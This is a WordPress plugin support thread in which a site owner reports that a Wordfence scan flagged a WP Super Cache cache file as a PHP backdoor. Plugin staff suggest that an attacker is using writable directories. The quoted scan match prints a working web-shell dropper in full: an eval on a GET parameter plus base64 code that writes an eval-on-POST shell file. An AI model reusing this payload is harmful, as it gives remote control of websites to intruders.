Backdoor:PHP/rce.1091

  • Resolved tlgtimeshare

    (@tlgtimeshare)


    8 months, 2 weeks ago

    WordFence scan just flagged the following:

    • Filename: meta-wp-cache-903cc823335e8c894ee76962e8c7f802.php
    • File Type: Not a core, theme, or plugin file from wordpress.org.
    • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: @eval($_GET%5B%27fuck%27%5D);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));gzip-text\/html”}

      The issue type is: Backdoor:PHP/rce.10912
      Description: Remote code execution that is often featured in backdoors

      This is the first instance of this happening. I have found some info here: https://wordpress.org/support/topic/frequent-malware-in-wp-super-cache-cached-pages/

      I have deleted the file, and after reading the thread above and the original from here it appears to be a false positive, but any feedback is appreciated. Thanks.
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare.
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare.
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare. Reason: extra info
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare.
Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support Alin (a11n)

    (@alinclamba)

    8 months, 2 weeks ago

    Hi @tlgtimeshare,

    Thanks so much for all the details — and for sharing both the file and the background research you did!

    At this point, we’ve passed this along to our developers for a closer review, just to make sure everything’s in order or if anything further should be done. We’ll follow up here once we hear back — we want to be 100% sure your site is safe.

    Thanks again for your patience in the meantime!

    (Internal ref: HOG Slack)

    Plugin Author Donncha O Caoimh (a11n)

    (@donncha)

    8 months, 2 weeks ago

    This wasn’t put there by WP Super Cache, but you may have an attacker on your site, and they’re using the cache directory to put their malware. They could also be using your uploads directory or anywhere else that the web server can write to.

    Those meta files usually begin with <?php die(); to discourage people from trying to load them.

    Plugin Support Tamirat B. (a11n)

    (@tamirat22)

    8 months ago

    Hello @tlgtimeshare,

    It’s been one week since this topic was last updated. I’m going to mark this thread as solved. If you have any further questions or need more help, you’re welcome to open another thread here. Cheers!

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Backdoor:PHP/rce.1091’ is closed to new replies.